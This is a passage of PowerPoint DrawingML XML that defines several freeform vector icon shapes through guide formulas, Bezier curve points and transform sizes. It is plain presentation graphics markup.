                  <a:gd name="T10" fmla="*/ 58 w 77"/>
                  <a:gd name="T11" fmla="*/ 53 h 77"/>
                  <a:gd name="T12" fmla="*/ 58 w 77"/>
                  <a:gd name="T13" fmla="*/ 5 h 77"/>
                  <a:gd name="T14" fmla="*/ 77 w 77"/>
                  <a:gd name="T15" fmla="*/ 39 h 77"/>
                  <a:gd name="T16" fmla="*/ 74 w 77"/>
                  <a:gd name="T17" fmla="*/ 53 h 77"/>
                  <a:gd name="T18" fmla="*/ 58 w 77"/>
                  <a:gd name="T19" fmla="*/ 53 h 77"/>
                  <a:gd name="T20" fmla="*/ 24 w 77"/>
                  <a:gd name="T21" fmla="*/ 58 h 77"/>
                  <a:gd name="T22" fmla="*/ 72 w 77"/>
                  <a:gd name="T23" fmla="*/ 58 h 77"/>
                  <a:gd name="T24" fmla="*/ 38 w 77"/>
                  <a:gd name="T25" fmla="*/ 77 h 77"/>
                  <a:gd name="T26" fmla="*/ 24 w 77"/>
                  <a:gd name="T27" fmla="*/ 74 h 77"/>
                  <a:gd name="T28" fmla="*/ 24 w 77"/>
                  <a:gd name="T29" fmla="*/ 58 h 77"/>
                  <a:gd name="T30" fmla="*/ 32 w 77"/>
                  <a:gd name="T31" fmla="*/ 17 h 77"/>
                  <a:gd name="T32" fmla="*/ 1 w 77"/>
                  <a:gd name="T33" fmla="*/ 48 h 77"/>
                  <a:gd name="T34" fmla="*/ 0 w 77"/>
                  <a:gd name="T35" fmla="*/ 39 h 77"/>
                  <a:gd name="T36" fmla="*/ 20 w 77"/>
                  <a:gd name="T37" fmla="*/ 5 h 77"/>
                  <a:gd name="T38" fmla="*/ 32 w 77"/>
                  <a:gd name="T39" fmla="*/ 17 h 77"/>
                  <a:gd name="T40" fmla="*/ 19 w 77"/>
                  <a:gd name="T41" fmla="*/ 38 h 77"/>
                  <a:gd name="T42" fmla="*/ 19 w 77"/>
                  <a:gd name="T43" fmla="*/ 72 h 77"/>
                  <a:gd name="T44" fmla="*/ 3 w 77"/>
                  <a:gd name="T45" fmla="*/ 54 h 77"/>
                  <a:gd name="T46" fmla="*/ 19 w 77"/>
                  <a:gd name="T47" fmla="*/ 38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7" h="77">
                    <a:moveTo>
                      <a:pt x="53" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="2"/>
                      <a:pt x="25" y="2"/>
                      <a:pt x="25" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="1"/>
                      <a:pt x="34" y="0"/>
                      <a:pt x="38" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="0"/>
                      <a:pt x="48" y="1"/>
                      <a:pt x="53" y="3"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="53" y="30"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="58" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="5"/>
                      <a:pt x="58" y="5"/>
                      <a:pt x="58" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="12"/>
                      <a:pt x="77" y="24"/>
                      <a:pt x="77" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="44"/>
                      <a:pt x="76" y="49"/>
                      <a:pt x="74" y="53"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="58" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="58"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="58"/>
                      <a:pt x="72" y="58"/>
                      <a:pt x="72" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="69"/>
                      <a:pt x="53" y="77"/>
                      <a:pt x="38" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="77"/>
                      <a:pt x="28" y="76"/>
                      <a:pt x="24" y="74"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="48"/>
                      <a:pt x="1" y="48"/>
                      <a:pt x="1" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="45"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="8" y="12"/>
                      <a:pt x="20" y="5"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="17"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="38"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="72"/>
                      <a:pt x="19" y="72"/>
                      <a:pt x="19" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="68"/>
                      <a:pt x="6" y="62"/>
                      <a:pt x="3" y="54"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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4" name="Freeform 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF5C821-0FAD-4774-8160-951121EE18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0276" y="4031724"/>
                <a:ext cx="229008" cy="197690"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 62"/>
                  <a:gd name="T2" fmla="*/ 54 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 62"/>
                  <a:gd name="T4" fmla="*/ 54 w 72"/>
                  <a:gd name="T5" fmla="*/ 9 h 62"/>
                  <a:gd name="T6" fmla="*/ 18 w 72"/>
                  <a:gd name="T7" fmla="*/ 9 h 62"/>
                  <a:gd name="T8" fmla="*/ 18 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 62"/>
                  <a:gd name="T10" fmla="*/ 67 w 72"/>
                  <a:gd name="T11" fmla="*/ 13 h 62"/>
                  <a:gd name="T12" fmla="*/ 4 w 72"/>
                  <a:gd name="T13" fmla="*/ 13 h 62"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 18 h 62"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 40 h 62"/>
                  <a:gd name="T18" fmla="*/ 4 w 72"/>
                  <a:gd name="T19" fmla="*/ 44 h 62"/>
                  <a:gd name="T20" fmla="*/ 18 w 72"/>
                  <a:gd name="T21" fmla="*/ 44 h 62"/>
                  <a:gd name="T22" fmla="*/ 18 w 72"/>
                  <a:gd name="T23" fmla="*/ 62 h 62"/>
                  <a:gd name="T24" fmla="*/ 54 w 72"/>
                  <a:gd name="T25" fmla="*/ 62 h 62"/>
                  <a:gd name="T26" fmla="*/ 54 w 72"/>
                  <a:gd name="T27" fmla="*/ 44 h 62"/>
                  <a:gd name="T28" fmla="*/ 67 w 72"/>
                  <a:gd name="T29" fmla="*/ 44 h 62"/>
                  <a:gd name="T30" fmla="*/ 72 w 72"/>
                  <a:gd name="T31" fmla="*/ 40 h 62"/>
                  <a:gd name="T32" fmla="*/ 72 w 72"/>
                  <a:gd name="T33" fmla="*/ 18 h 62"/>
                  <a:gd name="T34" fmla="*/ 67 w 72"/>
                  <a:gd name="T35" fmla="*/ 13 h 62"/>
                  <a:gd name="T36" fmla="*/ 49 w 72"/>
                  <a:gd name="T37" fmla="*/ 58 h 62"/>
                  <a:gd name="T38" fmla="*/ 22 w 72"/>
                  <a:gd name="T39" fmla="*/ 58 h 62"/>
                  <a:gd name="T40" fmla="*/ 22 w 72"/>
                  <a:gd name="T41" fmla="*/ 35 h 62"/>
                  <a:gd name="T42" fmla="*/ 49 w 72"/>
                  <a:gd name="T43" fmla="*/ 35 h 62"/>
                  <a:gd name="T44" fmla="*/ 49 w 72"/>
                  <a:gd name="T45" fmla="*/ 58 h 62"/>
                  <a:gd name="T46" fmla="*/ 68 w 72"/>
                  <a:gd name="T47" fmla="*/ 20 h 62"/>
                  <a:gd name="T48" fmla="*/ 65 w 72"/>
                  <a:gd name="T49" fmla="*/ 23 h 62"/>
                  <a:gd name="T50" fmla="*/ 62 w 72"/>
                  <a:gd name="T51" fmla="*/ 20 h 62"/>
                  <a:gd name="T52" fmla="*/ 65 w 72"/>
                  <a:gd name="T53" fmla="*/ 17 h 62"/>
                  <a:gd name="T54" fmla="*/ 68 w 72"/>
                  <a:gd name="T55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2" h="62">
                    <a:moveTo>
                      <a:pt x="18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18" y="9"/>
                      <a:pt x="18" y="9"/>
                      <a:pt x="18" y="9"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67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2" y="13"/>
                      <a:pt x="0" y="15"/>
                      <a:pt x="0" y="1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2"/>
                      <a:pt x="2" y="44"/>
                      <a:pt x="4" y="4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70" y="44"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="40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5"/>
                      <a:pt x="70" y="13"/>
                      <a:pt x="67" y="13"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="49" y="58"/>
                    </a:move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49" y="35"/>
                      <a:pt x="49" y="35"/>
                      <a:pt x="49" y="35"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="49" y="58"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="68" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="22"/>
                      <a:pt x="67" y="23"/>
                      <a:pt x="65" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="23"/>
                      <a:pt x="62" y="22"/>
                      <a:pt x="62" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="18"/>
                      <a:pt x="63" y="17"/>
                      <a:pt x="65" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="17"/>
                      <a:pt x="68" y="18"/>
                      <a:pt x="6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5" name="Freeform 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{180BF8D4-3472-4248-87D5-F7F4AC7230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37" y="3841862"/>
                <a:ext cx="230965" cy="230965"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 72"/>
                  <a:gd name="T1" fmla="*/ 36 h 72"/>
                  <a:gd name="T2" fmla="*/ 13 w 72"/>
                  <a:gd name="T3" fmla="*/ 33 h 72"/>
                  <a:gd name="T4" fmla="*/ 1 w 72"/>
                  <a:gd name="T5" fmla="*/ 29 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 36 h 72"/>
                  <a:gd name="T8" fmla="*/ 11 w 72"/>
                  <a:gd name="T9" fmla="*/ 62 h 72"/>
                  <a:gd name="T10" fmla="*/ 19 w 72"/>
                  <a:gd name="T11" fmla="*/ 51 h 72"/>
                  <a:gd name="T12" fmla="*/ 13 w 72"/>
                  <a:gd name="T13" fmla="*/ 36 h 72"/>
                  <a:gd name="T14" fmla="*/ 58 w 72"/>
                  <a:gd name="T15" fmla="*/ 36 h 72"/>
                  <a:gd name="T16" fmla="*/ 52 w 72"/>
                  <a:gd name="T17" fmla="*/ 51 h 72"/>
                  <a:gd name="T18" fmla="*/ 60 w 72"/>
                  <a:gd name="T19" fmla="*/ 62 h 72"/>
                  <a:gd name="T20" fmla="*/ 72 w 72"/>
                  <a:gd name="T21" fmla="*/ 36 h 72"/>
                  <a:gd name="T22" fmla="*/ 71 w 72"/>
                  <a:gd name="T23" fmla="*/ 29 h 72"/>
                  <a:gd name="T24" fmla="*/ 58 w 72"/>
                  <a:gd name="T25" fmla="*/ 33 h 72"/>
                  <a:gd name="T26" fmla="*/ 58 w 72"/>
                  <a:gd name="T27" fmla="*/ 36 h 72"/>
                  <a:gd name="T28" fmla="*/ 40 w 72"/>
                  <a:gd name="T29" fmla="*/ 14 h 72"/>
                  <a:gd name="T30" fmla="*/ 55 w 72"/>
                  <a:gd name="T31" fmla="*/ 25 h 72"/>
                  <a:gd name="T32" fmla="*/ 68 w 72"/>
                  <a:gd name="T33" fmla="*/ 21 h 72"/>
                  <a:gd name="T34" fmla="*/ 40 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 40 w 72"/>
                  <a:gd name="T37" fmla="*/ 14 h 72"/>
                  <a:gd name="T38" fmla="*/ 16 w 72"/>
                  <a:gd name="T39" fmla="*/ 25 h 72"/>
                  <a:gd name="T40" fmla="*/ 31 w 72"/>
                  <a:gd name="T41" fmla="*/ 14 h 72"/>
                  <a:gd name="T42" fmla="*/ 31 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 72"/>
                  <a:gd name="T44" fmla="*/ 3 w 72"/>
                  <a:gd name="T45" fmla="*/ 21 h 72"/>
                  <a:gd name="T46" fmla="*/ 16 w 72"/>
                  <a:gd name="T47" fmla="*/ 25 h 72"/>
                  <a:gd name="T48" fmla="*/ 45 w 72"/>
                  <a:gd name="T49" fmla="*/ 56 h 72"/>
                  <a:gd name="T50" fmla="*/ 36 w 72"/>
                  <a:gd name="T51" fmla="*/ 58 h 72"/>
                  <a:gd name="T52" fmla="*/ 26 w 72"/>
                  <a:gd name="T53" fmla="*/ 56 h 72"/>
                  <a:gd name="T54" fmla="*/ 18 w 72"/>
                  <a:gd name="T55" fmla="*/ 67 h 72"/>
                  <a:gd name="T56" fmla="*/ 36 w 72"/>
                  <a:gd name="T57" fmla="*/ 72 h 72"/>
                  <a:gd name="T58" fmla="*/ 53 w 72"/>
                  <a:gd name="T59" fmla="*/ 67 h 72"/>
                  <a:gd name="T60" fmla="*/ 45 w 72"/>
                  <a:gd name="T61" fmla="*/ 5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2">
                    <a:moveTo>
                      <a:pt x="13" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="35"/>
                      <a:pt x="13" y="34"/>
                      <a:pt x="13" y="3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1"/>
                      <a:pt x="0" y="34"/>
                      <a:pt x="0" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="46"/>
                      <a:pt x="4" y="56"/>
                      <a:pt x="11" y="6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6" y="47"/>
                      <a:pt x="13" y="42"/>
                      <a:pt x="13" y="36"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="58" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="42"/>
                      <a:pt x="56" y="47"/>
                      <a:pt x="52" y="51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7" y="56"/>
                      <a:pt x="72" y="46"/>
                      <a:pt x="72" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="34"/>
                      <a:pt x="71" y="31"/>
                      <a:pt x="71" y="29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4"/>
                      <a:pt x="58" y="35"/>
                      <a:pt x="58" y="36"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="40" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="15"/>
                      <a:pt x="52" y="19"/>
                      <a:pt x="55" y="25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3" y="10"/>
                      <a:pt x="53" y="2"/>
                      <a:pt x="40" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="40" y="14"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="19"/>
                      <a:pt x="25" y="15"/>
                      <a:pt x="31" y="14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9" y="2"/>
                      <a:pt x="8" y="10"/>
                      <a:pt x="3" y="21"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="45" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="58"/>
                      <a:pt x="39" y="58"/>
                      <a:pt x="36" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="58"/>
                      <a:pt x="29" y="58"/>
                      <a:pt x="26" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="67"/>
                      <a:pt x="18" y="67"/>
                      <a:pt x="18" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="70"/>
                      <a:pt x="30" y="72"/>
                      <a:pt x="36" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="72"/>
                      <a:pt x="48" y="70"/>
                      <a:pt x="53" y="67"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="45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6" name="Freeform 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD616CE9-A9C8-4EAB-B00F-17323594C3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78439" y="1082029"/>
                <a:ext cx="221179" cy="221178"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 69"/>
                  <a:gd name="T1" fmla="*/ 0 h 69"/>
                  <a:gd name="T2" fmla="*/ 0 w 69"/>
                  <a:gd name="T3" fmla="*/ 35 h 69"/>
                  <a:gd name="T4" fmla="*/ 35 w 69"/>
                  <a:gd name="T5" fmla="*/ 69 h 69"/>
                  <a:gd name="T6" fmla="*/ 69 w 69"/>
                  <a:gd name="T7" fmla="*/ 35 h 69"/>
                  <a:gd name="T8" fmla="*/ 35 w 69"/>
                  <a:gd name="T9" fmla="*/ 0 h 69"/>
                  <a:gd name="T10" fmla="*/ 35 w 69"/>
                  <a:gd name="T11" fmla="*/ 62 h 69"/>
                  <a:gd name="T12" fmla="*/ 7 w 69"/>
                  <a:gd name="T13" fmla="*/ 35 h 69"/>
                  <a:gd name="T14" fmla="*/ 35 w 69"/>
                  <a:gd name="T15" fmla="*/ 7 h 69"/>
                  <a:gd name="T16" fmla="*/ 62 w 69"/>
                  <a:gd name="T17" fmla="*/ 35 h 69"/>
                  <a:gd name="T18" fmla="*/ 35 w 69"/>
                  <a:gd name="T19" fmla="*/ 62 h 69"/>
                  <a:gd name="T20" fmla="*/ 22 w 69"/>
                  <a:gd name="T21" fmla="*/ 24 h 69"/>
                  <a:gd name="T22" fmla="*/ 37 w 69"/>
                  <a:gd name="T23" fmla="*/ 35 h 69"/>
                  <a:gd name="T24" fmla="*/ 22 w 69"/>
                  <a:gd name="T25" fmla="*/ 45 h 69"/>
                  <a:gd name="T26" fmla="*/ 22 w 69"/>
                  <a:gd name="T27" fmla="*/ 24 h 69"/>
                  <a:gd name="T28" fmla="*/ 39 w 69"/>
                  <a:gd name="T29" fmla="*/ 24 h 69"/>
                  <a:gd name="T30" fmla="*/ 54 w 69"/>
                  <a:gd name="T31" fmla="*/ 35 h 69"/>
                  <a:gd name="T32" fmla="*/ 39 w 69"/>
                  <a:gd name="T33" fmla="*/ 45 h 69"/>
                  <a:gd name="T34" fmla="*/ 39 w 69"/>
                  <a:gd name="T35" fmla="*/ 2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69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53"/>
                      <a:pt x="16" y="69"/>
                      <a:pt x="35" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="69"/>
                      <a:pt x="69" y="53"/>
                      <a:pt x="69" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="16"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="35" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="35" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="62"/>
                      <a:pt x="7" y="50"/>
                      <a:pt x="7" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="19"/>
                      <a:pt x="19" y="7"/>
                      <a:pt x="35" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="7"/>
                      <a:pt x="62" y="19"/>
                      <a:pt x="62" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="50"/>
                      <a:pt x="50" y="62"/>
                      <a:pt x="35" y="62"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="22" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="35"/>
                      <a:pt x="37" y="35"/>
                      <a:pt x="37" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="22" y="24"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="39" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="35"/>
                      <a:pt x="54" y="35"/>
                      <a:pt x="54" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="45"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="39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7" name="Freeform 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{711673EA-881A-47B7-B221-A799BEC8D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2483" y="3088291"/>
                <a:ext cx="242709" cy="252495"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 124"/>
                  <a:gd name="T1" fmla="*/ 129 h 129"/>
                  <a:gd name="T2" fmla="*/ 59 w 124"/>
                  <a:gd name="T3" fmla="*/ 70 h 129"/>
                  <a:gd name="T4" fmla="*/ 0 w 124"/>
                  <a:gd name="T5" fmla="*/ 129 h 129"/>
                  <a:gd name="T6" fmla="*/ 0 w 124"/>
                  <a:gd name="T7" fmla="*/ 0 h 129"/>
                  <a:gd name="T8" fmla="*/ 59 w 124"/>
                  <a:gd name="T9" fmla="*/ 58 h 129"/>
                  <a:gd name="T10" fmla="*/ 59 w 124"/>
                  <a:gd name="T11" fmla="*/ 0 h 129"/>
                  <a:gd name="T12" fmla="*/ 124 w 124"/>
                  <a:gd name="T13" fmla="*/ 65 h 129"/>
                  <a:gd name="T14" fmla="*/ 59 w 124"/>
                  <a:gd name="T15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29">
                    <a:moveTo>
                      <a:pt x="59" y="129"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59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8" name="Freeform 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78B2285-FFCC-40D0-A709-0FE2CC64D2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75405" y="2205535"/>
                <a:ext cx="256411" cy="254453"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 131"/>
                  <a:gd name="T1" fmla="*/ 130 h 130"/>
                  <a:gd name="T2" fmla="*/ 66 w 131"/>
                  <a:gd name="T3" fmla="*/ 130 h 130"/>
                  <a:gd name="T4" fmla="*/ 66 w 131"/>
                  <a:gd name="T5" fmla="*/ 0 h 130"/>
                  <a:gd name="T6" fmla="*/ 0 w 131"/>
                  <a:gd name="T7" fmla="*/ 0 h 130"/>
                  <a:gd name="T8" fmla="*/ 0 w 131"/>
                  <a:gd name="T9" fmla="*/ 130 h 130"/>
                  <a:gd name="T10" fmla="*/ 41 w 131"/>
                  <a:gd name="T11" fmla="*/ 16 h 130"/>
                  <a:gd name="T12" fmla="*/ 58 w 131"/>
                  <a:gd name="T13" fmla="*/ 16 h 130"/>
                  <a:gd name="T14" fmla="*/ 58 w 131"/>
                  <a:gd name="T15" fmla="*/ 32 h 130"/>
                  <a:gd name="T16" fmla="*/ 41 w 131"/>
                  <a:gd name="T17" fmla="*/ 32 h 130"/>
                  <a:gd name="T18" fmla="*/ 41 w 131"/>
                  <a:gd name="T19" fmla="*/ 16 h 130"/>
                  <a:gd name="T20" fmla="*/ 41 w 131"/>
                  <a:gd name="T21" fmla="*/ 49 h 130"/>
                  <a:gd name="T22" fmla="*/ 58 w 131"/>
                  <a:gd name="T23" fmla="*/ 49 h 130"/>
                  <a:gd name="T24" fmla="*/ 58 w 131"/>
                  <a:gd name="T25" fmla="*/ 65 h 130"/>
                  <a:gd name="T26" fmla="*/ 41 w 131"/>
                  <a:gd name="T27" fmla="*/ 65 h 130"/>
                  <a:gd name="T28" fmla="*/ 41 w 131"/>
                  <a:gd name="T29" fmla="*/ 49 h 130"/>
                  <a:gd name="T30" fmla="*/ 41 w 131"/>
                  <a:gd name="T31" fmla="*/ 81 h 130"/>
                  <a:gd name="T32" fmla="*/ 58 w 131"/>
                  <a:gd name="T33" fmla="*/ 81 h 130"/>
                  <a:gd name="T34" fmla="*/ 58 w 131"/>
                  <a:gd name="T35" fmla="*/ 98 h 130"/>
                  <a:gd name="T36" fmla="*/ 41 w 131"/>
                  <a:gd name="T37" fmla="*/ 98 h 130"/>
                  <a:gd name="T38" fmla="*/ 41 w 131"/>
                  <a:gd name="T39" fmla="*/ 81 h 130"/>
                  <a:gd name="T40" fmla="*/ 9 w 131"/>
                  <a:gd name="T41" fmla="*/ 16 h 130"/>
                  <a:gd name="T42" fmla="*/ 25 w 131"/>
                  <a:gd name="T43" fmla="*/ 16 h 130"/>
                  <a:gd name="T44" fmla="*/ 25 w 131"/>
                  <a:gd name="T45" fmla="*/ 32 h 130"/>
                  <a:gd name="T46" fmla="*/ 9 w 131"/>
                  <a:gd name="T47" fmla="*/ 32 h 130"/>
                  <a:gd name="T48" fmla="*/ 9 w 131"/>
                  <a:gd name="T49" fmla="*/ 16 h 130"/>
                  <a:gd name="T50" fmla="*/ 9 w 131"/>
                  <a:gd name="T51" fmla="*/ 49 h 130"/>
                  <a:gd name="T52" fmla="*/ 25 w 131"/>
                  <a:gd name="T53" fmla="*/ 49 h 130"/>
                  <a:gd name="T54" fmla="*/ 25 w 131"/>
                  <a:gd name="T55" fmla="*/ 65 h 130"/>
                  <a:gd name="T56" fmla="*/ 9 w 131"/>
                  <a:gd name="T57" fmla="*/ 65 h 130"/>
                  <a:gd name="T58" fmla="*/ 9 w 131"/>
                  <a:gd name="T59" fmla="*/ 49 h 130"/>
                  <a:gd name="T60" fmla="*/ 9 w 131"/>
                  <a:gd name="T61" fmla="*/ 81 h 130"/>
                  <a:gd name="T62" fmla="*/ 25 w 131"/>
                  <a:gd name="T63" fmla="*/ 81 h 130"/>
                  <a:gd name="T64" fmla="*/ 25 w 131"/>
                  <a:gd name="T65" fmla="*/ 98 h 130"/>
                  <a:gd name="T66" fmla="*/ 9 w 131"/>
                  <a:gd name="T67" fmla="*/ 98 h 130"/>
                  <a:gd name="T68" fmla="*/ 9 w 131"/>
                  <a:gd name="T69" fmla="*/ 81 h 130"/>
                  <a:gd name="T70" fmla="*/ 74 w 131"/>
                  <a:gd name="T71" fmla="*/ 41 h 130"/>
                  <a:gd name="T72" fmla="*/ 131 w 131"/>
                  <a:gd name="T73" fmla="*/ 41 h 130"/>
                  <a:gd name="T74" fmla="*/ 131 w 131"/>
                  <a:gd name="T75" fmla="*/ 49 h 130"/>
                  <a:gd name="T76" fmla="*/ 74 w 131"/>
                  <a:gd name="T77" fmla="*/ 49 h 130"/>
                  <a:gd name="T78" fmla="*/ 74 w 131"/>
                  <a:gd name="T79" fmla="*/ 41 h 130"/>
                  <a:gd name="T80" fmla="*/ 74 w 131"/>
                  <a:gd name="T81" fmla="*/ 130 h 130"/>
                  <a:gd name="T82" fmla="*/ 90 w 131"/>
                  <a:gd name="T83" fmla="*/ 130 h 130"/>
                  <a:gd name="T84" fmla="*/ 90 w 131"/>
                  <a:gd name="T85" fmla="*/ 98 h 130"/>
                  <a:gd name="T86" fmla="*/ 115 w 131"/>
                  <a:gd name="T87" fmla="*/ 98 h 130"/>
                  <a:gd name="T88" fmla="*/ 115 w 131"/>
                  <a:gd name="T89" fmla="*/ 130 h 130"/>
                  <a:gd name="T90" fmla="*/ 131 w 131"/>
                  <a:gd name="T91" fmla="*/ 130 h 130"/>
                  <a:gd name="T92" fmla="*/ 131 w 131"/>
